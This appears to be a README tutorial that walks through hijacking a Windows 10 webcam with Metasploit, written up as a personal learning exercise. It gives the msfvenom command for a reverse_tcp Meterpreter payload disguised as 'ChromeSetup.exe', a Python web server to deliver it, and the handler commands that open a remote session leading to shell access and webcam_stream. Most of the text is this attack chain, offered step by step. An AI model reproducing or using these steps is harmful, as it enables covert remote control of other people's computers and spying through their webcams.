# Hack_Windows10-WebCam__
                                                                                                           Hack a Windows 10 webcam – Metasploit

This project is for learning purposes only and is not to be used for malicious purposes. These tests were carried out on a personal device.
In this project i'm gonna learn how i can hack the webcam of my Windows 10 laptop.
(root mode requied)

1.......OK 
First of all i gonna use MSFVenom ! 
But what is MSFVenom ?

MFSVenom is a tool included in the Metasploit framework. It is the result of the merger of the former MSFpayload and MSFencode tools. MSFVenom will be used to create a payload 1  with an encoding. (or even multi-encoding) to evade antivirus software, for example. 
The tool is launched in a terminal.

2.......OK
mfsvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip-adress-kali(xxx.xxx.x.xx)> lport=<Listening-port (inmyexample1234> -f exe > ChromeSetup.exe

This command generates a payload for the Metasploit framework with the intention of creating a Windows executable (.exe).

Let's analyze :

||| mfsvenom: This is the main payload generation command in Metasploit.

||| -p windows/x64/meterpreter/reverse_tcp: This specifies the type of payload to be generated. In this case, it's a payload for 64-bit Windows architecture that uses the Meterpreter module to establish a reverse_tcp connection. This means that the target machine will connect outbound to the specified IP address to establish a remote control session.

||| lhost=<ip-adress-kali(xxx.xxx.x.xx)> This is the IP address of the attacker's machine listening to the connection and the target machine would attempt to connect to this IP address to establish a remote control session via the generated payload.

||| lport=<Listening-port>: This is the port on which we'll listen for the incoming connection(you can use 65 000 ports me i choosed 1234).

|||-f exe: This specifies the output format of the payload, in this case a Windows executable (.exe extension).

|||> ChromeSetup.exe: This redirects the command output to a file called "ChromeSetup.exe". This is the executable file that will be generated and potentially used in the context of an attack.

3.......OK
Next we want to start a python script in our Terminal window if python doesn't work try using python 2 or 3.

python -m SimpleHTTPServer 8080

This is a Python command used to launch a simple web server in the current directory. This server uses the specified port, in this example 8080.

Let's analyze :
||| python: This is the Python interpreter program.
||| -m SimpleHTTPServer: This is a built-in Python module called SimpleHTTPServer, which provides a basic HTTP server to serve files in the current directory.
||| 8080: This is the port number on which the server will listen for incoming connections.

Once you've executed this command, the web server will be started in the directory from which you issued the command. You'll be able to access the files in this directory via a web browser, using the address http://localhost:8080 in this case.

IMPORTANT NOTE :
When I was writing this, I learned that the python command -m SimpleHTTPServer 8080 uses the SimpleHTTPServer module that was present in versions of Python 2.x. However, if you're using Python 3.x, this module has been replaced by the http.server module.
Here's how you can run a simple HTTP server with Python 3.x : python -m http.server 8080

4.......OK
Now launch Metasploit : (msfconsole -q) to start the Metasploit framework in console mode (msfconsole) with the -q option, which stands for "quiet". The -q option is used to start Metasploit in silent mode, which means that banners and welcome information will not be displayed on startup.

You should see the msf6 tag appear:

1-
msf6 > use exploit/multi/handler---------------------------------------------------Is used to configure Metasploit as an exploit manager. The exploit manager is used to listen for reverse shells generated by exploits or payloads running on target machines.

2-Set the payload you want to release
msf6 > set payload windows/x64/meterpreter/reverse_tcp---------------------------Is used to define the type of payload you wish to use. The payload specified determines the behavior of the payload that will be delivered to the target machine upon successful exploitation.

3-Set the lhost ip of your kali machine(if you are on kali)
msf6 > set lhost <ip-adress-kali(xxx.xxx.x.xx)>--------------------The set LHOST XXX.XXX.X.XXX command in Metasploit is used to define the IP address on which the operating manager listens for return connections. In this example, the specified IP address is XXX.XXX.X.XXX

4-Set the port 
msf6 > set lport 1234

5-Use Run or Exploit for launch

Now u can see 1 session open kali --> windows10
U can tap shell to have the connection confirmation
Now you are in the windows pc D:\> tap help to watch the differents windows files
Tap exit and now meterpreter > help u can see now tools for metasploit like webcam_stream.
